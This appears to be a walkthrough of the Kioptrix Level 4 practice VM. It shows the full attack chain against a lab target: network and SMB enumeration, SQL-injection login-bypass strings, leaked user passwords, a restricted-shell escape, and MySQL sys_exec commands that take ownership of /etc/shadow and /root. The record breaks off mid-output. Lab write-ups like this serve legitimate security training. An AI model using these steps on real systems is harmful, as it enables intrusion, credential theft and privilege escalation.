Security Exposed: Kioptrix Level 4

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Kioptrix Level 4 (1.3) vulnarable VM:
http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.180.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.180.2 00:50:56:f9:f6:4a 1 60 VMware, Inc.
192.168.180.136 00:0c:29:08:fb:c7 1 60 VMware, Inc.
192.168.180.254 00:50:56:f4:3f:7c 1 60 VMware, Inc.

nmap -sV -T4 -O -F --version-light 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:29 EDT
Nmap scan report for 192.168.180.136
Host is up (0.00020s latency).
Not shown: 65 closed ports, 31 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:31 EDT
NSE: Loaded 132 scripts for scanning.
<omited>
Host is up, received arp-response (0.00021s latency).
Scanned at 2016-07-05 08:31:51 EDT for 33s
Not shown: 566 closed ports, 430 filtered ports
Reason: 566 resets and 430 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJQxDWMK4xxdEEdMA0YQLblzXV5xx6slDUANQmyouzmobMxTcImV1OfY9vB2LUjJwSbtuPn/Ef7LCik29SLab6FD59QsJKz3tOfX1UZJ9FeoxPhoVsfk+LDM4FbQxo0pPYhlQadVHAicjUnONl5WaaUEYuelAoU36v2wOKKDe+kRAAAAFQDAmqYNY1Ou7o5qEfZx0e9+XNUJ2QAAAIAt6puNENxfFnl74pmuKgeQaZQCsPnZlSyTODcP961mwFvTMHWD4pQsg0j6GlPUZrXUCmeTcNqbUQQHei6l8U1zMO4xFYxVz2kkGhbQAa/FGd1r3TqKXu+jQxTmp7xvNBVHoT3rKPqcd12qtweTjlYKlcHgW5XL3mR1Nw91JrhMlAAAAIAWHQLIOjwyAFvUhjGqEVK1Y0QoCoNLGEFd+wcrMLjpZEz7/Ay9IhyuBuRbeR/TxjitcUX6CC58cF5KoyhyQytFH17ZMpegb9x29mQiAg4wK1MGOi9D8OU1cW/COd/E8LvrNLxMFllatLVscw/WXXTi8fFmOEzkGsaRKC6NiQhDlg==
| 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApA/UX2iq4JYXncTEDfBoyJWguuDkWDvyw4HlLyc1UBT3Pn2wnYLYa0MjwkBtPilmf5X1zK1z3su7oBEcSEt6o7RzDEUbC1O6nRvY4oSKwBD0qLaIHM1V5CZ+YDtLneY6IriJjHJ0DgNyXalPbQ36VZgu20o9dH8ItDkjlZTxRHPE6RnPiD1aZSLo452LNU3N+/2M/ny7QMvIyPNkcojeZQWS7RRSDa2lEUw1X1ECL6zCMiWC0lhciZf5ieum9MnATTF3dgk4BnCq6dfdEvae0avSypMcs6no2CJ2j9PPoAQ1VWj/WlAZzEbfna9YQ2cx8sW/W/9GfKA5SuLFt1u0iQ==
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=7/5%OT=22%CT=1%CU=33742%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=577BA8D8%P=i586-pc-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B
OS:4ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0
OS:)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6
OS:%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN
OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.004 days (since Tue Jul 5 08:27:17 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX4<00> Flags: <unique><active>
| KIOPTRIX4<03> Flags: <unique><active>
| KIOPTRIX4<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51861/tcp): CLEAN (Couldn't connect)
| Check 2 (port 63161/tcp): CLEAN (Couldn't connect)
| Check 3 (port 12408/udp): CLEAN (Failed to receive data)
| Check 4 (port 10447/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2016-07-05T11:32:22-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.71 seconds
Raw packets sent: 1450 (64.546KB) | Rcvd: 586 (24.154KB)

nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:34 EDT
<omited some large info>
Scanned at 2016-07-05 08:34:11 EDT for 1193s
Not shown: 954 closed ports
Reason: 954 port-unreaches
PORT STATE SERVICE REASON VERSION
<omited>
137/udp open netbios-ns udp-response ttl 64 Microsoft Windows XP netbios-ssn
<omited>
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.01%E=4%D=7/5%OT=%CT=%CU=2%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=577BADEC%P=i586-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: KIOPTRIX4; OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX4<00> Flags: <unique><active>
| KIOPTRIX4<03> Flags: <unique><active>
| KIOPTRIX4<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00

TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1193.64 seconds
Raw packets sent: 1710 (50.767KB) | Rcvd: 1046 (60.396KB)

dirb http://192.168.180.136

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jul 5 08:57:06 2016
URL_BASE: http://192.168.180.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.180.136/ ----
+ http://192.168.180.136/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.180.136/images/
+ http://192.168.180.136/index (CODE:200|SIZE:1255)
+ http://192.168.180.136/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.180.136/john/
+ http://192.168.180.136/logout (CODE:302|SIZE:0)
+ http://192.168.180.136/member (CODE:302|SIZE:220)
+ http://192.168.180.136/server-status (CODE:403|SIZE:335)

---- Entering directory: http://192.168.180.136/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.180.136/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Jul 5 08:57:07 2016
DOWNLOADED: 4612 - FOUND: 6

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.136/FUZZ

********************************************************

* Wfuzz 2.1.3 - The Web Bruteforcer *

********************************************************

Target: http://192.168.180.136/FUZZ

Total requests: 3036

==================================================================

ID Response Lines Word Chars Request

==================================================================

00540: C=403 10 L 33 W 330 Ch "cgi-bin/"

..."

01341: C=200 45 L 94 W 1255 Ch "index"

..."

01349: C=301 9 L 31 W 358 Ch "images"

..."

01609: C=302 0 L 0 W 0 Ch "logout"

..."

01726: C=302 1 L 22 W 220 Ch "member"

..."

01745: C=301 9 L 31 W 356 Ch "john"

..."

02311: C=301 9 L 31 W 358 Ch "robert"

..."

03035: C=404 9 L 35 W 324 Ch "t-bone"..."^C

nbtscan 192.168.180.136

Doing NBT name scan for addresses from 192.168.180.136

IP address NetBIOS Name Server User MAC address

------------------------------------------------------------------------------

192.168.180.136 KIOPTRIX4 <server> KIOPTRIX4 00:00:00:00:00:00

root@kali:/# enum4linux -a 192.168.180.136

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 5 09:06:47 2016

==========================

| Target Information |

==========================

Target ........... 192.168.180.136

RID Range ........ 500-550,1000-1050

Username ......... ''

Password ......... ''

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================

| Enumerating Workgroup/Domain on 192.168.180.136 |

=======================================================

[+] Got domain/workgroup name: WORKGROUP

===============================================

| Nbtstat Information for 192.168.180.136 |

===============================================

Looking up status of 192.168.180.136

KIOPTRIX4 <00> - B <ACTIVE> Workstation Service

KIOPTRIX4 <03> - B <ACTIVE> Messenger Service

KIOPTRIX4 <20> - B <ACTIVE> File Server Service

..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser

WORKGROUP <1d> - B <ACTIVE> Master Browser

WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

========================================

| Session Check on 192.168.180.136 |

========================================

[+] Server 192.168.180.136 allows sessions using username '', password ''

==============================================

| Getting domain SID for 192.168.180.136 |

==============================================

Domain Name: WORKGROUP

Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

=========================================

| OS information on 192.168.180.136 |

=========================================

[+] Got OS info for 192.168.180.136 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

[+] Got OS info for 192.168.180.136 from srvinfo:

KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)

platform_id : 500

os version : 4.9

server type : 0x809a03

================================

| Users on 192.168.180.136 |

================================

index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)

index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)

index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)

index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)

index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]

user:[robert] rid:[0xbbc]

user:[root] rid:[0x3e8]

user:[john] rid:[0xbba]

user:[loneferret] rid:[0xbb8]

============================================

| Share Enumeration on 192.168.180.136 |

============================================

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server Comment

--------- -------

KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master

--------- -------

---- ----------------

WORKGROUP KIOPTRIX4

[+] Attempting to map shares on 192.168.180.136

//192.168.180.136/print$ Mapping: DENIED, Listing: N/A

//192.168.180.136/IPC$ [E] Can't understand response:

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

NT_STATUS_NETWORK_ACCESS_DENIED listing \*

=======================================================

| Password Policy Information for 192.168.180.136 |

=======================================================

[+] Attaching to 192.168.180.136 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] KIOPTRIX4

[+] Builtin

[+] Password Info for Domain: KIOPTRIX4

[+] Minimum password length: 5

[+] Password history length: None

[+] Maximum password age: Not Set

[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0

[+] Domain Password Store Cleartext: 0

[+] Domain Password Lockout Admins: 0

[+] Domain Password No Clear Change: 0

[+] Domain Password No Anon Change: 0

[+] Domain Password Complex: 0

[+] Minimum password age: None

[+] Reset Account Lockout Counter: 30 minutes

[+] Locked Account Duration: 30 minutes

[+] Account Lockout Threshold: None

[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled

Minimum Password Length: 0

=================================

| Groups on 192.168.180.136 |

=================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

==========================================================================

| Users on 192.168.180.136 via RID cycling (RIDS: 500-550,1000-1050) |

==========================================================================

[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631

[I] Found new SID: S-1-22-1

[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\loneferret (Local User)

S-1-22-1-1001 Unix User\john (Local User)

S-1-22-1-1002 Unix User\robert (Local User)

[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''

S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)

S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)

S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)

S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)

S-1-5-32-545 BUILTIN\Users (Local Group)

S-1-5-32-546 BUILTIN\Guests (Local Group)

S-1-5-32-547 BUILTIN\Power Users (Local Group)

S-1-5-32-548 BUILTIN\Account Operators (Local Group)

S-1-5-32-549 BUILTIN\Server Operators (Local Group)

S-1-5-32-550 BUILTIN\Print Operators (Local Group)

================================================

| Getting printer info for 192.168.180.136 |

================================================

No printers returned.

enum4linux complete on Tue Jul 5 09:06:53 2016

root@kali:/# smbclient -N -L 192.168.180.136

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename Type Comment

--------- ---- -------

print$ Disk Printer Drivers

IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Server Comment

--------- -------

KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)

Workgroup Master

--------- -------

-----------------------------------------

WORKGROUP KIOPTRIX4

This just wasted my time:

hydra -l loneferret -P darkc0de.lst 192.168.180.136 ssh

So I left it and continued:
http://192.168.180.136/john/

Let's try the following for password:
' OR '1'='1
space at the end of the next query:
' OR '1'='1' --
' OR '1'='1' ({
' OR '1'='1' /*

What we get is:
Member's Control Panel
Username : john
Password : MyNameIsJohn

Username : robert

Password : ADGAdsafdfwt4gadfga==

' OR 1=1 #

SSH password is the same so let's try:

ssh john@192.168.180.136

The authenticity of host '192.168.180.136 (192.168.180.136)' can't be established.

RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '192.168.180.136' (RSA) to the list of known hosts.

john@192.168.180.136's password:

Welcome to LigGoat Security Systems - We are Watching

== Welcome LigGoat Employee ==

LigGoat Shell is in place so you don't screw up

Type '?' or 'help' to get the list of allowed commands

john:~$

john:~$ sudo su

*** forbidden sudo -> sudo su

cd /

*** forbidden path -> "/"

*** You have 0 warning(s) left, before getting kicked out.

This incident has been reported.

*** forbidden path -> "/"

*** Kicked out

Connection to 192.168.180.136 closed.

Haha, well. Let us try once more.

Type '?' or 'help' to get the list of allowed commands

john:~$ help

cd clear echo exit help ll lpath ls

echo os.system('/bin/bash')

john@Kioptrix4:/home/loneferret$ ls -la

total 44

drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .

drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..

-rw------- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history

-rw-r--r-- 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout

-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc

-rw-r--r-- 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory

-rw------- 1 root root 68 2012-02-04 10:05 .my.cnf.5086

-rw------- 1 root root 1 2012-02-04 10:05 .mysql.5086

-rw------- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history

-rw------- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history

-rw-r--r-- 1 loneferret loneferret 586 2012-02-04 09:58 .profile

-rw-r--r-- 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

libuuid:x:100:101::/var/lib/libuuid:/bin/sh

dhcp:x:101:102::/nonexistent:/bin/false

syslog:x:102:103::/home/syslog:/bin/false

klog:x:103:104::/home/klog:/bin/false

mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash

john:x:1001:1001:,,,:/home/john:/bin/kshell

robert:x:1002:1002:,,,:/home/robert:/bin/kshell

john@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

cat debian_version
lenny/sid

john@Kioptrix4:/etc/ssh$ ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 2844 1692 ? Ss 11:22 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 11:22 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 11:22 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 11:22 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 11:22 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 11:22 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 11:22 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 11:22 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 11:22 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 11:22 0:00 [kacpi_notify]
root 170 0.0 0.0 0 0 ? S< 11:22 0:00 [kseriod]
root 209 0.0 0.0 0 0 ? S 11:22 0:00 [pdflush]
root 210 0.0 0.0 0 0 ? S 11:22 0:00 [pdflush]
root 211 0.0 0.0 0 0 ? S< 11:22 0:00 [kswapd0]
root 253 0.0 0.0 0 0 ? S< 11:22 0:00 [aio/0]
root 1465 0.0 0.0 0 0 ? S< 11:22 0:00 [ata/0]
root 1468 0.0 0.0 0 0 ? S< 11:22 0:00 [ata_aux]
root 1475 0.0 0.0 0 0 ? S< 11:22 0:00 [scsi_eh_0]
root 1481 0.0 0.0 0 0 ? S< 11:22 0:00 [scsi_eh_1]
root 1494 0.0 0.0 0 0 ? S< 11:22 0:00 [ksuspend_usbd]
root 1499 0.0 0.0 0 0 ? S< 11:22 0:00 [khubd]
root 2362 0.0 0.0 0 0 ? S< 11:22 0:00 [scsi_eh_2]
root 2604 0.0 0.0 0 0 ? S< 11:22 0:00 [kjournald]
root 2772 0.0 0.0 2104 704 ? S<s 11:22 0:00 /sbin/udevd --d
root 3078 0.0 0.0 0 0 ? S< 11:22 0:00 [kgameportd]
root 3216 0.0 0.0 0 0 ? S< 11:22 0:00 [kpsmoused]
root 4540 0.0 0.0 1716 492 tty4 Ss+ 11:22 0:00 /sbin/getty 384
root 4541 0.0 0.0 1716 492 tty5 Ss+ 11:22 0:00 /sbin/getty 384
root 4545 0.0 0.0 1716 492 tty2 Ss+ 11:22 0:00 /sbin/getty 384
root 4546 0.0 0.0 1716 492 tty3 Ss+ 11:22 0:00 /sbin/getty 384
root 4552 0.0 0.0 1716 492 tty6 Ss+ 11:22 0:00 /sbin/getty 384
syslog 4589 0.0 0.0 1936 648 ? Ss 11:22 0:00 /sbin/syslogd -
root 4608 0.0 0.0 1872 540 ? S 11:22 0:00 /bin/dd bs 1 if
klog 4610 0.0 0.1 3160 2048 ? Ss 11:22 0:00 /sbin/klogd -P
root 4629 0.0 0.0 5316 988 ? Ss 11:22 0:01 /usr/sbin/sshd
root 4685 0.0 0.0 1772 524 ? S 11:22 0:00 /bin/sh /usr/bi
root 4727 0.0 1.5 126988 16276 ? Sl 11:22 0:00 /usr/sbin/mysql
root 4729 0.0 0.0 1700 556 ? S 11:22 0:00 logger -p daemo
root 4802 0.0 0.1 6532 1356 ? Ss 11:22 0:00 /usr/sbin/nmbd
root 4804 0.0 0.2 10108 2540 ? Ss 11:22 0:00 /usr/sbin/smbd
root 4818 0.0 0.0 10108 1024 ? S 11:22 0:00 /usr/sbin/smbd
root 4819 0.0 0.1 8084 1340 ? Ss 11:22 0:00 /usr/sbin/winbi
root 4839 0.0 0.1 8208 1704 ? S 11:22 0:00 /usr/sbin/winbi
daemon 4840 0.0 0.0 1984 420 ? Ss 11:22 0:00 /usr/sbin/atd
root 4851 0.0 0.0 2104 884 ? Ss 11:22 0:00 /usr/sbin/cron
root 4873 0.0 0.5 20464 6196 ? Ss 11:22 0:00 /usr/sbin/apach
dhcp 4922 0.0 0.0 2440 764 ? Ss 11:22 0:00 dhclient eth1
root 4929 0.0 0.0 1716 492 tty1 Ss+ 11:22 0:00 /sbin/getty 384
root 4944 0.0 0.0 8084 872 ? S 11:32 0:00 /usr/sbin/winbi
root 4945 0.0 0.1 8092 1264 ? S 11:32 0:00 /usr/sbin/winbi
www-data 5608 0.0 0.3 20464 3276 ? S 13:32 0:00 /usr/sbin/apach
root 5626 0.0 0.3 11360 3724 ? Ss 13:38 0:00 sshd: john [pri
john 5628 0.0 0.1 11516 1860 ? S 13:38 0:00 sshd: john@pts/
john 5629 0.0 0.3 5892 3816 pts/0 Ss 13:38 0:00 python /bin/ksh
www-data 5640 0.0 0.3 20464 3276 ? S 13:41 0:00 /usr/sbin/apach
www-data 5641 0.0 0.3 20464 3276 ? S 13:42 0:00 /usr/sbin/apach
www-data 5642 0.0 0.3 20464 3276 ? S 13:42 0:00 /usr/sbin/apach
www-data 5643 0.0 0.3 20464 3276 ? S 13:43 0:00 /usr/sbin/apach
john 5653 0.0 0.0 1772 480 pts/0 S 13:44 0:00 sh -c /bin/bash
john 5654 0.0 0.2 5432 2852 pts/0 R 13:44 0:00 /bin/bash
john 5749 0.0 0.0 2644 1012 pts/0 R+ 14:00 0:00 ps -aux

MySQL is running as root.

john@Kioptrix4:/var/www$ cat checklogin.php

<?php

ob_start();

$host="localhost"; // Host name

$username="root"; // Mysql username

$password=""; // Mysql password

$db_name="members"; // Database name

$tbl_name="members"; // Table name

mysql -u root -h localhost

Let's play with system permissions:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 56

Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> SELECT sys_exec('chown john.john /etc/shadow');

+-----------------------------------------+

| sys_exec('chown john.john /etc/shadow') |

+-----------------------------------------+

| NULL |

+-----------------------------------------+

1 row in set (0.00 sec)

mysql> SELECT sys_exec('chown john.john /etc/passwd');
+-----------------------------------------+
| sys_exec('chown john.john /etc/passwd') |
+-----------------------------------------+
| NULL |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT sys_exec('chown -R john.john /root');

+--------------------------------------+

| sys_exec('chown -R john.john /root') |

